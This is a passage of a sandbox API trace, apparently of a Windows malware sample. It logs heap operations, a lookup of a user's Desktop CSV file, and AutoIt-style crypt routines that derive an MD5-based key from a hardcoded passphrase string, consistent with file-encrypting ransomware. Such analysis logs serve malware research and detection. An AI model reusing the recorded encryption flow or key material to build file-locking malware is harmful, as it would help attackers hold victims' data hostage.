dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0120.662] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0120.662] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0120.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0120.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0120.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0120.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0120.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0120.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0120.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0120.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0120.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0120.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0120.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0120.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0120.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0120.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0120.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0120.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0120.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0120.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0120.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0120.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0120.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0120.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0120.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0120.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0120.663] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\aYyiLdyhoIdALfth0-Sh.csv", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4eb2670, ftCreationTime.dwHighDateTime=0x1d5e8af, ftLastAccessTime.dwLowDateTime=0x7e4b67d0, ftLastAccessTime.dwHighDateTime=0x1d5f018, ftLastWriteTime.dwLowDateTime=0x7e4b67d0, ftLastWriteTime.dwHighDateTime=0x1d5f018, nFileSizeHigh=0x0, nFileSizeLow=0x97a6, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="aYyiLdyhoIdALfth0-Sh.csv", cAlternateFileName="AYYILD~1.CSV")) returned 0x41ac500 [0120.664] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0120.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0120.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0120.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0120.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0120.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.664] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0120.664] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.664] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0120.664] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.664] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0120.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0120.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0120.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0120.665] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0120.665] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0120.665] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0120.665] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0120.665] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0120.666] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.666] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0120.666] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.666] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0120.666] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0120.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca958, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0120.666] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0120.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0120.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0120.666] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0120.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0120.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0120.666] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.666] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0120.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca838, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0120.666] CryptHashData (hHash=0x41ac2c0, pbData=0x17e2b48, dwDataLen=0x22, dwFlags=0x1) returned 1 [0120.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0120.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0120.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f28 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0120.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8f00 [0120.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0120.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0120.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0120.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0120.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0120.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0120.668] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0120.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0120.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0120.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0120.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0120.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0120.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921b8 [0120.668] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca910 [0120.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0120.668] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0120.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0120.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0120.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0120.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0120.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0120.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0120.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0120.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0120.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0120.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0120.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0120.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0120.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0120.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0120.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0120.669] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0120.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9b8 [0120.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0120.669] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0120.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0120.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0120.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0120.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0120.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0120.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0120.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0120.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0120.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0120.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0120.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0120.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0120.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0120.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0120.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0120.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0120.670] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0120.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0120.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0120.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0120.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0120.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0120.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0120.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0120.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0120.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0120.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0120.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0120.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0120.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0120.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 